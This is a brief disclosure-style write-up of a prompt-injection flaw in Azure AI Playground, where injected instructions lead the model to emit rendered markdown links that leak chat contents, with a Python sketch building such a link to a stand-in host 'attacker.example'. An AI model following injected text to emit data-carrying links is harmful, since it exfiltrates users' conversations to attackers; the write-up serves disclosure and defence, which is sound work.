In Azure AI Playground, a Prompt Injection attack could cause the LLM to return markdown tags that the Playground rendered. This would have allowed an adversary whose data makes it into the chat context (e.g., via an uploaded file) to exfiltrate the victim's data through rendered hyperlinks whose URLs embed that data, as sketched below.
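The exfiltration channel works by smuggling data into a URL: the injected instructions tell the model to emit a markdown link pointing at an attacker-controlled server, with the conversation contents URL-encoded into the query string. When the victim clicks the rendered link, the browser delivers the data to the attacker. A minimal Python sketch of how such a payload could be constructed, assuming a hypothetical attacker endpoint (`attacker.example`) and link text that are not from the original report:

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint; not part of the original report.
EXFIL_URL = "https://attacker.example/collect"

def exfil_link(stolen_text: str) -> str:
    """Build the markdown hyperlink an injected prompt could coerce the model to emit.

    The victim's data is URL-encoded into the query string, so when the
    rendered link is clicked, the browser sends the data to the attacker.
    """
    return f"[Click here for more details]({EXFIL_URL}?q={quote(stolen_text)})"

# What the model's markdown output might look like if the injection succeeds:
print(exfil_link("summary of the victim's chat"))
# [Click here for more details](https://attacker.example/collect?q=summary%20of%20the%20victim%27s%20chat)
```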
However, the severity of this issue is low: there were no integrations that could pull remote content, so Indirect Prompt Injection was not possible, and the victim would have to bring the malicious prompt into the chat themselves, e.g., by copying it from elsewhere. A similar issue affected GCP Vertex AI.